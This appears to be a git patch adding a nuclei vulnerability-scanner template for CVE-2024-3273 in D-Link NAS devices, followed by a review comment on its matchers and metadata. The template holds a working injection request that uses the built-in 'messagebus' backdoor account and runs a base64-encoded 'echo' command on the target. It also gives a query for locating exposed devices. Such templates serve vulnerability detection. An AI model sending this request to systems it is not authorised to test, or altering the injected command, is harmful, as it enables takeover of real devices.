From 224c2f1cf5e63425c607b3165293bd889df4a9d5 Mon Sep 17 00:00:00 2001
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com>
Date: Tue, 9 Apr 2024 22:45:08 +0530
Subject: [PATCH] Create CVE-2024-3273.yaml
---
http/cves/2024/CVE-2024-3273.yaml | 29 +++++++++++++++++++++++++++++
1 file changed, 29 insertions(+)
create mode 100644 http/cves/2024/CVE-2024-3273.yaml
diff --git a/http/cves/2024/CVE-2024-3273.yaml b/http/cves/2024/CVE-2024-3273.yaml
new file mode 100644
index 0000000000..61bff3fcd6
--- /dev/null
+++ b/http/cves/2024/CVE-2024-3273.yaml
@@ -0,0 +1,29 @@
+id: CVE-2024-3273
+info:
+ name: D-Link Network Attached Storage - Command Injection and Backdoor Account
+ author: pussycat0x
+ severity: high
+ reference:
+ - https://github.com/netsecfish/dlink
+ - https://www.bleepingcomputer.com/news/security/over-92-000-exposed-d-link-nas-devices-have-a-backdoor-account/#google_vignette
+ metadata:
+ verified: true
+ fofa-query: app="D_Link-DNS-ShareCenter"
+ tags: cve,cve2024,dlink,nas
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=ZWNobyB0ZXN0"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "1"
+ - "test"
+ condition: and
+
+ - type: status
+ status:
+ - 200
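Review bot: The `word` matcher at the end of the hunk accepts any 200 response that contains both `1` and `test`, and no `part:` is set, so an unrelated page, a catch-all error page or a honeypot that happens to include those substrings would be reported as vulnerable. Since the expected output is the fixed string the request asks the device to echo, consider echoing a per-run marker built from nuclei's `{{randstr}}` and matching on that marker with an explicit `part: body`, so a hit actually shows the command ran. The `info` block also has no `description`, no `classification` entry such as `cve-id: CVE-2024-3273`, and no `remediation` line, which whoever triages a finding will need. A short comment above the request noting that this is an active check, which runs an `echo` on the target through the hard-coded `messagebus` account, would help operators decide where it is appropriate to run.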